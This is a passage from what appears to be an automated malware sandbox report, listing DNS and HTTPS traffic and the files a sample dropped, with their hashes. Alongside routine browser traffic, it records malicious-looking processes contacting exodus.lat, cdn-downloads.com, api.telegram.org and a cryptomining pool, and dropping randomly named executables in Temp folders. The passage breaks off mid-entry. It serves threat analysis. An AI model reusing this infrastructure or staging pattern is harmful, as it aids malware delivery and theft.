                                • 8.8.8.8:53
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  206 B
                                  238 B
                                  2
                                  2

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.160.144.191

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.160.144.191

                                • 8.8.8.8:53
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  100 B
                                  128 B
                                  1
                                  1

                                  DNS Request

                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

                                  DNS Response

                                  2600:1901:0:74e4::

                                • 8.8.8.8:53
                                  prod.ads.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  175 B
                                  1
                                  1

                                  DNS Request

                                  prod.ads.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  shavar.prod.mozaws.net
                                  dns
                                  firefox.exe
                                  68 B
                                  116 B
                                  1
                                  1

                                  DNS Request

                                  shavar.prod.mozaws.net

                                  DNS Response

                                  52.32.237.164
                                  44.226.106.83
                                  52.33.23.190

                                • 8.8.8.8:53
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  206 B
                                  262 B
                                  2
                                  2

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  2600:1901:0:92a9::

                                  DNS Request

                                  prod.content-signature-chains.prod.webservices.mozgcp.net

                                  DNS Response

                                  2600:1901:0:92a9::

                                • 8.8.8.8:53
                                  shavar.prod.mozaws.net
                                  dns
                                  firefox.exe
                                  68 B
                                  153 B
                                  1
                                  1

                                  DNS Request

                                  shavar.prod.mozaws.net

                                • 216.58.213.14:443
                                  youtube.com
                                  https
                                  firefox.exe
                                  1.8kB
                                  9.3kB
                                  6
                                  10
                                • 34.149.97.1:443
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  https
                                  firefox.exe
                                  1.8kB
                                  4.4kB
                                  6
                                  6
                                • 8.8.8.8:53
                                  www.youtube.com
                                  dns
                                  firefox.exe
                                  122 B
                                  574 B
                                  2
                                  2

                                  DNS Request

                                  www.youtube.com

                                  DNS Response

                                  142.250.187.206
                                  142.250.200.46
                                  142.250.179.238
                                  142.250.180.14
                                  172.217.169.46
                                  172.217.169.78
                                  172.217.16.238
                                  216.58.201.110
                                  142.250.187.238
                                  142.250.200.14
                                  216.58.204.78
                                  142.250.178.14

                                  DNS Request

                                  www.youtube.com

                                  DNS Response

                                  172.217.16.238
                                  142.250.180.14
                                  172.217.169.78
                                  142.250.178.14
                                  142.250.200.46
                                  172.217.169.46
                                  142.250.187.206
                                  142.250.179.238
                                  142.250.187.238
                                  142.250.200.14
                                  216.58.204.78
                                  216.58.201.110

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  188 B
                                  220 B
                                  2
                                  2

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.149.100.209

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.149.100.209

                                • 8.8.8.8:53
                                  youtube-ui.l.google.com
                                  dns
                                  firefox.exe
                                  138 B
                                  522 B
                                  2
                                  2

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  172.217.16.238
                                  142.250.178.14
                                  172.217.169.46
                                  142.250.200.46
                                  142.250.187.238
                                  142.250.200.14
                                  142.250.187.206
                                  142.250.179.238
                                  142.250.180.14
                                  172.217.169.78
                                  216.58.204.78
                                  216.58.201.110

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  142.250.180.14
                                  216.58.201.110
                                  142.250.178.14
                                  142.250.187.238
                                  216.58.204.78
                                  142.250.200.46
                                  172.217.16.238
                                  142.250.200.14
                                  142.250.187.206
                                  142.250.179.238
                                  172.217.169.78
                                  172.217.169.46

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  187 B
                                  1
                                  1

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  youtube-ui.l.google.com
                                  dns
                                  firefox.exe
                                  138 B
                                  362 B
                                  2
                                  2

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  2a00:1450:4009:815::200e
                                  2a00:1450:4009:823::200e
                                  2a00:1450:4009:821::200e
                                  2a00:1450:4009:822::200e

                                  DNS Request

                                  youtube-ui.l.google.com

                                  DNS Response

                                  2a00:1450:4009:821::200e
                                  2a00:1450:4009:823::200e
                                  2a00:1450:4009:822::200e
                                  2a00:1450:4009:815::200e

                                • 142.250.187.206:443
                                  youtube-ui.l.google.com
                                  https
                                  firefox.exe
                                  2.8kB
                                  10.5kB
                                  11
                                  14
                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  130 B
                                  162 B
                                  2
                                  2

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  142.250.200.14

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  142.250.200.14

                                • 8.8.8.8:53
                                  14.213.58.216.in-addr.arpa
                                  dns
                                  72 B
                                  141 B
                                  1
                                  1

                                  DNS Request

                                  14.213.58.216.in-addr.arpa

                                • 8.8.8.8:53
                                  firefox-settings-attachments.cdn.mozilla.net
                                  dns
                                  firefox.exe
                                  90 B
                                  177 B
                                  1
                                  1

                                  DNS Request

                                  firefox-settings-attachments.cdn.mozilla.net

                                  DNS Response

                                  34.117.121.53

                                • 8.8.8.8:53
                                  164.237.32.52.in-addr.arpa
                                  dns
                                  72 B
                                  135 B
                                  1
                                  1

                                  DNS Request

                                  164.237.32.52.in-addr.arpa

                                • 8.8.8.8:53
                                  206.187.250.142.in-addr.arpa
                                  dns
                                  74 B
                                  113 B
                                  1
                                  1

                                  DNS Request

                                  206.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  142.250.200.14

                                • 8.8.8.8:53
                                  consent.youtube.com
                                  dns
                                  firefox.exe
                                  65 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  consent.youtube.com

                                  DNS Response

                                  2a00:1450:4009:822::200e

                                • 142.250.200.14:443
                                  consent.youtube.com
                                  https
                                  firefox.exe
                                  2.2kB
                                  9.4kB
                                  10
                                  11
                                • 8.8.8.8:53
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  212 B
                                  244 B
                                  2
                                  2

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.121.53

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.117.121.53

                                • 8.8.8.8:53
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  212 B
                                  398 B
                                  2
                                  2

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Request

                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  14.200.250.142.in-addr.arpa
                                  dns
                                  146 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  14.200.250.142.in-addr.arpa

                                  DNS Request

                                  14.200.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  227.187.250.142.in-addr.arpa
                                  dns
                                  148 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  227.187.250.142.in-addr.arpa

                                  DNS Request

                                  227.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  74.204.58.216.in-addr.arpa
                                  dns
                                  144 B
                                  342 B
                                  2
                                  2

                                  DNS Request

                                  74.204.58.216.in-addr.arpa

                                  DNS Request

                                  74.204.58.216.in-addr.arpa

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  firefox.exe
                                  60 B
                                  76 B
                                  1
                                  1

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  142.250.187.196

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  firefox.exe
                                  120 B
                                  152 B
                                  2
                                  2

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  142.250.187.196

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  142.250.187.196

                                • 8.8.8.8:53
                                  www.google.com
                                  dns
                                  firefox.exe
                                  60 B
                                  88 B
                                  1
                                  1

                                  DNS Request

                                  www.google.com

                                  DNS Response

                                  2a00:1450:4009:81f::2004

                                • 142.250.187.196:443
                                  www.google.com
                                  https
                                  firefox.exe
                                  2.0kB
                                  9.3kB
                                  8
                                  10
                                • 8.8.8.8:53
                                  195.187.250.142.in-addr.arpa
                                  dns
                                  148 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  195.187.250.142.in-addr.arpa

                                  DNS Request

                                  195.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  196.187.250.142.in-addr.arpa
                                  dns
                                  148 B
                                  224 B
                                  2
                                  2

                                  DNS Request

                                  196.187.250.142.in-addr.arpa

                                  DNS Request

                                  196.187.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  211.38.74.45.in-addr.arpa
                                  dns
                                  71 B
                                  136 B
                                  1
                                  1

                                  DNS Request

                                  211.38.74.45.in-addr.arpa

                                • 8.8.8.8:53
                                  221.197.63.92.in-addr.arpa
                                  dns
                                  72 B
                                  132 B
                                  1
                                  1

                                  DNS Request

                                  221.197.63.92.in-addr.arpa

                                • 8.8.8.8:53
                                  exodus.lat
                                  dns
                                  curl.exe
                                  112 B
                                  144 B
                                  2
                                  2

                                  DNS Request

                                  exodus.lat

                                  DNS Request

                                  exodus.lat

                                  DNS Response

                                  203.161.45.11

                                  DNS Response

                                  203.161.45.11

                                • 8.8.8.8:53
                                  11.45.161.203.in-addr.arpa
                                  dns
                                  144 B
                                  238 B
                                  2
                                  2

                                  DNS Request

                                  11.45.161.203.in-addr.arpa

                                  DNS Request

                                  11.45.161.203.in-addr.arpa

                                • 8.8.8.8:53
                                  api.ipify.org
                                  dns
                                  curl.exe
                                  59 B
                                  107 B
                                  1
                                  1

                                  DNS Request

                                  api.ipify.org

                                  DNS Response

                                  172.67.74.152
                                  104.26.13.205
                                  104.26.12.205

                                • 8.8.8.8:53
                                  c.pki.goog
                                  dns
                                  56 B
                                  107 B
                                  1
                                  1

                                  DNS Request

                                  c.pki.goog

                                  DNS Response

                                  142.250.200.35

                                • 8.8.8.8:53
                                  152.74.67.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  152.74.67.172.in-addr.arpa

                                • 8.8.8.8:53
                                  cdn-downloads.com
                                  dns
                                  COMSurrogate.exe
                                  63 B
                                  79 B
                                  1
                                  1

                                  DNS Request

                                  cdn-downloads.com

                                  DNS Response

                                  203.161.45.11

                                • 8.8.8.8:53
                                  r11.o.lencr.org
                                  dns
                                  61 B
                                  160 B
                                  1
                                  1

                                  DNS Request

                                  r11.o.lencr.org

                                  DNS Response

                                  88.221.135.106
                                  88.221.135.113

                                • 8.8.8.8:53
                                  168.245.100.95.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  168.245.100.95.in-addr.arpa

                                • 8.8.8.8:53
                                  106.135.221.88.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  106.135.221.88.in-addr.arpa

                                • 8.8.8.8:53
                                  location.services.mozilla.com
                                  dns
                                  firefox.exe
                                  75 B
                                  153 B
                                  1
                                  1

                                  DNS Request

                                  location.services.mozilla.com

                                  DNS Response

                                  35.190.72.216

                                • 8.8.8.8:53
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  164 B
                                  196 B
                                  2
                                  2

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                  DNS Response

                                  35.244.181.201

                                  DNS Response

                                  35.244.181.201

                                • 8.8.8.8:53
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  110 B
                                  1
                                  1

                                  DNS Request

                                  prod.classify-client.prod.webservices.mozgcp.net

                                  DNS Response

                                  35.190.72.216

                                • 8.8.8.8:53
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  175 B
                                  1
                                  1

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                • 8.8.8.8:53
                                  201.181.244.35.in-addr.arpa
                                  dns
                                  73 B
                                  126 B
                                  1
                                  1

                                  DNS Request

                                  201.181.244.35.in-addr.arpa

                                • 8.8.8.8:53
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  187 B
                                  1
                                  1

                                  DNS Request

                                  prod.classify-client.prod.webservices.mozgcp.net

                                • 35.190.72.216:443
                                  prod.classify-client.prod.webservices.mozgcp.net
                                  https
                                  firefox.exe
                                  1.8kB
                                  4.3kB
                                  6
                                  6
                                • 8.8.8.8:53
                                  ciscobinary.openh264.org
                                  dns
                                  firefox.exe
                                  140 B
                                  572 B
                                  2
                                  2

                                  DNS Request

                                  ciscobinary.openh264.org

                                  DNS Request

                                  ciscobinary.openh264.org

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  65 B
                                  81 B
                                  1
                                  1

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  142.250.187.206

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  130 B
                                  162 B
                                  2
                                  2

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  142.250.187.206

                                  DNS Response

                                  142.250.187.206

                                • 8.8.8.8:53
                                  a19.dscg10.akamai.net
                                  dns
                                  firefox.exe
                                  134 B
                                  198 B
                                  2
                                  2

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                  DNS Response

                                  88.221.134.209
                                  88.221.134.155

                                • 8.8.8.8:53
                                  a19.dscg10.akamai.net
                                  dns
                                  firefox.exe
                                  67 B
                                  123 B
                                  1
                                  1

                                  DNS Request

                                  a19.dscg10.akamai.net

                                  DNS Response

                                  2a02:26f0:a1::58dd:869b
                                  2a02:26f0:a1::58dd:86d1

                                • 8.8.8.8:53
                                  redirector.gvt1.com
                                  dns
                                  firefox.exe
                                  65 B
                                  93 B
                                  1
                                  1

                                  DNS Request

                                  redirector.gvt1.com

                                  DNS Response

                                  2a00:1450:4009:81f::200e

                                • 142.250.187.206:443
                                  redirector.gvt1.com
                                  https
                                  firefox.exe
                                  1.9kB
                                  9.3kB
                                  8
                                  10
                                • 8.8.8.8:53
                                  r4---sn-aigzrnsz.gvt1.com
                                  dns
                                  firefox.exe
                                  71 B
                                  116 B
                                  1
                                  1

                                  DNS Request

                                  r4---sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  74.125.175.169

                                • 8.8.8.8:53
                                  r4.sn-aigzrnsz.gvt1.com
                                  dns
                                  firefox.exe
                                  69 B
                                  85 B
                                  1
                                  1

                                  DNS Request

                                  r4.sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  74.125.175.169

                                • 8.8.8.8:53
                                  r4.sn-aigzrnsz.gvt1.com
                                  dns
                                  firefox.exe
                                  138 B
                                  194 B
                                  2
                                  2

                                  DNS Request

                                  r4.sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  2a00:1450:4009:1b::9

                                  DNS Request

                                  r4.sn-aigzrnsz.gvt1.com

                                  DNS Response

                                  2a00:1450:4009:1b::9

                                • 8.8.8.8:53
                                  216.72.190.35.in-addr.arpa
                                  dns
                                  72 B
                                  124 B
                                  1
                                  1

                                  DNS Request

                                  216.72.190.35.in-addr.arpa

                                • 8.8.8.8:53
                                  31.243.111.52.in-addr.arpa
                                  dns
                                  72 B
                                  158 B
                                  1
                                  1

                                  DNS Request

                                  31.243.111.52.in-addr.arpa

                                • 8.8.8.8:53
                                  209.134.221.88.in-addr.arpa
                                  dns
                                  73 B
                                  139 B
                                  1
                                  1

                                  DNS Request

                                  209.134.221.88.in-addr.arpa

                                • 8.8.8.8:53
                                  169.175.125.74.in-addr.arpa
                                  dns
                                  73 B
                                  111 B
                                  1
                                  1

                                  DNS Request

                                  169.175.125.74.in-addr.arpa

                                • 74.125.175.169:443
                                  r4.sn-aigzrnsz.gvt1.com
                                  https
                                  firefox.exe
                                  1.8kB
                                  5.9kB
                                  6
                                  7
                                • 8.8.8.8:53
                                  play.google.com
                                  dns
                                  firefox.exe
                                  61 B
                                  1

                                  DNS Request

                                  play.google.com

                                • 8.8.8.8:53
                                  play.google.com
                                  dns
                                  firefox.exe
                                  61 B
                                  77 B
                                  1
                                  1

                                  DNS Request

                                  play.google.com

                                  DNS Response

                                  142.250.179.238

                                • 8.8.8.8:53
                                  play.google.com
                                  dns
                                  firefox.exe
                                  122 B
                                  178 B
                                  2
                                  2

                                  DNS Request

                                  play.google.com

                                  DNS Response

                                  2a00:1450:4009:81d::200e

                                  DNS Request

                                  play.google.com

                                  DNS Response

                                  2a00:1450:4009:81d::200e

                                • 142.250.179.238:443
                                  play.google.com
                                  https
                                  firefox.exe
                                  2.2kB
                                  9.4kB
                                  9
                                  11
                                • 8.8.8.8:53
                                  238.179.250.142.in-addr.arpa
                                  dns
                                  74 B
                                  113 B
                                  1
                                  1

                                  DNS Request

                                  238.179.250.142.in-addr.arpa

                                • 8.8.8.8:53
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  dns
                                  firefox.exe
                                  82 B
                                  175 B
                                  1
                                  1

                                  DNS Request

                                  prod.balrog.prod.cloudops.mozgcp.net

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  110 B
                                  1
                                  1

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                  DNS Response

                                  34.149.100.209

                                • 8.8.8.8:53
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  dns
                                  firefox.exe
                                  94 B
                                  187 B
                                  1
                                  1

                                  DNS Request

                                  prod.remote-settings.prod.webservices.mozgcp.net

                                • 8.8.8.8:53
                                  api.telegram.org
                                  dns
                                  COMSurrogate.exe
                                  62 B
                                  78 B
                                  1
                                  1

                                  DNS Request

                                  api.telegram.org

                                  DNS Response

                                  149.154.167.220

                                • 8.8.8.8:53
                                  pool.hashvault.pro
                                  dns
                                  mi.exe
                                  64 B
                                  80 B
                                  1
                                  1

                                  DNS Request

                                  pool.hashvault.pro

                                  DNS Response

                                  95.179.241.203

                                • 8.8.8.8:53
                                  220.167.154.149.in-addr.arpa
                                  dns
                                  74 B
                                  167 B
                                  1
                                  1

                                  DNS Request

                                  220.167.154.149.in-addr.arpa

                                • 8.8.8.8:53
                                  203.241.179.95.in-addr.arpa
                                  dns
                                  146 B
                                  244 B
                                  2
                                  2

                                  DNS Request

                                  203.241.179.95.in-addr.arpa

                                  DNS Request

                                  203.241.179.95.in-addr.arpa

                                • 142.250.200.14:443
                                  consent.youtube.com
                                  https
                                  firefox.exe
                                  2.6kB
                                  10.5kB
                                  8
                                  14
                                • 8.8.8.8:53
                                  185.66.119.188.in-addr.arpa
                                  dns
                                  73 B
                                  133 B
                                  1
                                  1

                                  DNS Request

                                  185.66.119.188.in-addr.arpa

                                • 8.8.8.8:53
                                  233.38.18.104.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  233.38.18.104.in-addr.arpa

                                • 8.8.8.8:53
                                  23.149.64.172.in-addr.arpa
                                  dns
                                  72 B
                                  134 B
                                  1
                                  1

                                  DNS Request

                                  23.149.64.172.in-addr.arpa

                                • 8.8.8.8:53
                                  206.157.214.31.in-addr.arpa
                                  dns
                                  146 B
                                  214 B
                                  2
                                  2

                                  DNS Request

                                  206.157.214.31.in-addr.arpa

                                  DNS Request

                                  206.157.214.31.in-addr.arpa

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  968cb9309758126772781b83adb8a28f

                                  SHA1

                                  8da30e71accf186b2ba11da1797cf67f8f78b47c

                                  SHA256

                                  92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                  SHA512

                                  4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  18KB

                                  MD5

                                  3cbbd23e401cd6493403e366be8e2a08

                                  SHA1

                                  307c905805d256a0031957c6d8012dfe1f29270e

                                  SHA256

                                  699a78b4f2dd345e186823206efeefa12ab2a85e9a760e44738138ac451292d6

                                  SHA512

                                  d7f4ad629667e41823625a11c8da88eb4ad54bd2c2935fc38c94ab4a3e7535da4dec4423c966a300141f1faeb1e1c5ee7d901d92f35e18c9b029fbc3486b2fd4

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  18KB

                                  MD5

                                  29cf49326e382aae24d776fa6062c0ee

                                  SHA1

                                  054ebe60b02f74750903cfcd153f6ab2c5f2ea4b

                                  SHA256

                                  f0de72f3dc555387b027f88ec3a26548c2385861feb9ec6d4b578f3fd2581701

                                  SHA512

                                  97e021e28184456eafb5d293db92dead0d711afb9038635dc0b74cafa3065dbf8959c5af9e63090f548cdd67d89c93edaea0f1693281a5b26405c1c2ede46f84

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  16KB

                                  MD5

                                  9ef735b02779a95afb4db09fd4d32359

                                  SHA1

                                  625aad54e9ab3964cc09d0bfa6e9dc7379607717

                                  SHA256

                                  0a577e3d8bf1ff31ac2efda84f5d3b98ad0f593590568054654a3cc0d423152a

                                  SHA512

                                  5e1830f24bc94ccbdf4f0cf5489efb2147bd5a101214054e67dde075867e648555ac2953b850f58f7bf3fdbbbd9d3edd8e74ec657a6ba2488740df00dd56a3df

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  16KB

                                  MD5

                                  b5832bacf67fc3dfce849295c432f6e8

                                  SHA1

                                  a97230f90c5b0541f94d531d1dd622106a284d55

                                  SHA256

                                  2335070b5dd1c40ed4490a3beb45c17c60e748cac50398d457abe2c64104fc11

                                  SHA512

                                  a89ef305ed068ee9a11c3292ae89e6938dabc7baf02006457956ffa3437b41ed90f7ad14a27d2023de7b6181375b832383e2cb31e1128c0bbf1c7c3ae864bae3

                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\activity-stream.discovery_stream.json.tmp

                                  Filesize

                                  28KB

                                  MD5

                                  ae88242849a6d51be04b78fbf8b74631

                                  SHA1

                                  a8838e7963aba8c3714122d4206014f30a331124

                                  SHA256

                                  8d07e2105479829456f1ec6cc8b21b7c847aae9a789e9c97a5972b5de5d9ed0e

                                  SHA512

                                  6e5c297b69e1e7ba00e029159085b8e21d9f59eb2c6da6a02b06cca4e8ab88df7133e3cbf805bf19283d71c7187313cf298ff7299b43366dae3619537d80a35f

                                • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                  Filesize

                                  15KB

                                  MD5

                                  96c542dec016d9ec1ecc4dddfcbaac66

                                  SHA1

                                  6199f7648bb744efa58acf7b96fee85d938389e4

                                  SHA256

                                  7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                                  SHA512

                                  cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                                • C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe

                                  Filesize

                                  2.8MB

                                  MD5

                                  b466bf1dc60388a22cb73be01ca6bf57

                                  SHA1

                                  21eb9665e42d6c4a8d9e764627049b2a6e3a69a4

                                  SHA256

                                  e5f0f0c3383080fc2702779e3040c490ab022af69a4bc8c61bf9b1f6514ae7ad

                                  SHA512

                                  6cb51dae17b3bcef6254ecf6538ecc49cdd53c40c979fd743f49987b28d05c033781b1047dbf25b203b02bf70ce4205dcc1cc5bbea46119cb0e2cd0ce140cbe2

                                • C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\sqlite3.dll

                                  Filesize

                                  630KB

                                  MD5

                                  e477a96c8f2b18d6b5c27bde49c990bf

                                  SHA1

                                  e980c9bf41330d1e5bd04556db4646a0210f7409

                                  SHA256

                                  16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

                                  SHA512

                                  335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

                                • C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe

                                  Filesize

                                  1.7MB

                                  MD5

                                  ff4cf493ac5f7663d1cfc243e6646eb7

                                  SHA1

                                  ff7184eae695580f1e86fac340925c7f01f4de6d

                                  SHA256

                                  72a99a945b705fc1c8fa59c3db6810be2aadeaecc34f954f5ab314574002d748

                                  SHA512

                                  1eef407d5bfa8b94bb98cb0a64e7c73cb94176507fa924642c6cf21192965ba8856390214379fddf192b88e19377768ead94fb4d393831e47ca230b6b168f14b

                                • C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe

                                  Filesize

                                  3.4MB

                                  MD5

                                  3a16d0e4e4522073da3c8a5a9f9e790b

                                  SHA1

                                  7a42a21a348d2e49c67b426d333a5c354ed2c83e

                                  SHA256

                                  ccc4dd64df98c26da462a17a8df9f927d02e202d88ada8cfba92b7bbeb954c3e

                                  SHA512

                                  1213c3e077b660afa65133f0b5943bd866f02d736284791dc99ae4d30c6ed7705eb55999cb4a3be1cc0a394111904154bc72a2d0f1fdc453893ecf9a4a25b99a

                                • C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe

                                  Filesize

                                  6.9MB

                                  MD5

                                  a67e34baacfca98f323981d3b0087f3b

                                  SHA1

                                  d22ccae2971df83812acaebc750d9a2c87357fe5

                                  SHA256

                                  6092579a997945b10d3f279693baa004d180417ccfec941c45eb20705a2b4706

                                  SHA512

                                  39c7a33ab14e518a09f4e022c1c61c8b5a88417af3ce5a1769ab8c0fa328a178fcd79a098c4c7f3344df75e2b7cd22ebf6a88d43ad61599c53a3c89d54c29d6d

                                • C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe

                                  Filesize

                                  1.7MB

                                  MD5

                                  d124690a731b9f9511d39dda3a5ef3d8

                                  SHA1

                                  26fc68f194903e93db04711c9524c442845b583c

                                  SHA256

                                  47cb2f5b689678b3292f548d7346c6b400dedc6a2b1dde54b2e343b8b5fc2775

                                  SHA512

                                  e936a771891f85dca11f607acaae7780e9b11eb7ae7afcbc6273ce2386f1d9739c2db55b45c5a8fb4de2af84636e7610cfba096d0a26ab7c31d25176dcf22634

                                • C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe

                                  Filesize

                                  5.0MB

                                  MD5

                                  343a771efad9c921a3abb8d4201f6040

                                  SHA1

                                  b142b17a0dfb82b75071950eba743d0150ad12ff

                                  SHA256

                                  6d08fa0a96bed6936121d80a60807e6682f0e1ce65f4fca2006fffcf109aa85e

                                  SHA512

                                  d0ebd4de115ae62ea6d7aee7e636f767fe8823b09a0beb22bf64805ea4f01034b7b89092fe0083d9bc694fea3fe2d457aeadff49b4a17c81bc099861620c91e2

                                • C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe

                                  Filesize

                                  945KB

                                  MD5

                                  8746d7ddcd593e7a9a38016b27a6dde0

                                  SHA1

                                  a505737a7bebefbd81d28d729e26187d15ea3aa7

                                  SHA256

                                  159e04da0b72590135477fa37369439acc2dd400ba28af7597ab05f0be906280

                                  SHA512

                                  9d2c4372c85f2f176f5034c4eb54ba1290260b69cd760fb17e7f3a54ecb490290fa033716f2019231c50b321d314e36b5d6003253e176be8d250cbe689e45b52

                                • C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe

                                  Filesize

                                  2.6MB

                                  MD5

                                  fc6804a55358a117689dab9333fd0ee5

                                  SHA1

                                  bbe4309bc6d99a67ecc0e866907889659d8e7031

                                  SHA256

                                  4decdc379789942364429bbbed02dda060d79e613ed657ca541fd5f37873fd58

                                  SHA512

